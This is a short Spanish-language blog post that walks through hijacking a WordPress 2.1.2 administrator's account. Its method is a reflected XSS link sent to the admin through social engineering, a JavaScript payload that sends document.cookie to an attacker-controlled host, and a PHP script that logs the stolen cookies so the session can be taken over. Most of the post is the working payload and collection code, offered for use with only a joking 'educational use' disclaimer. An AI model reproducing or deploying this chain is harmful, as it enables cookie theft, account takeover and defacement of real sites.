Hablar no te hace inteligente

Defaceando/Hackeando Blogs en Wordpress 2.1.2

El dia de hoy he decidido publicar como podemos defacearnos/hackearnos un blog que utiliza worpress 2.1.2 aprovechandonos de un bug xss que posee. Primero aremos lo siguientes:

Si no sabemos que version de wordpress usa, si usamos firefox, damos click derecho y luego a ver codigo fuente o tambien ctrl + u y buscamos esto:
meta name="generator" content="WordPress 2.1.2" /

Utilizando un poco de ingieneria social le mandamos al administrador de la web un link que contenga esto:
?title%3E%3Ch1%3Esip%3C/h1%3E%3CIMG%20SRC=javascript:location.href=http://tuweb.com/a.js%3E

Donde el archivo a.js contiene:

i=new/**/Image();i.src='http://tuweb.com/adv.php?cookie=’+document.cookie;
Y con este archivo robas la cookie

$cookie = $_REQUEST[cookie]; $fic=fopen("cookie.txt", "a"); fwrite($fic, "$cookie\n"); fclose($fic);

Y luego cuando ya tenemos la cookie del administrador simplemente lo editamos con el achilles o tamper data.

Esto es solo para uso educativo xD.

Continuar Leyendo...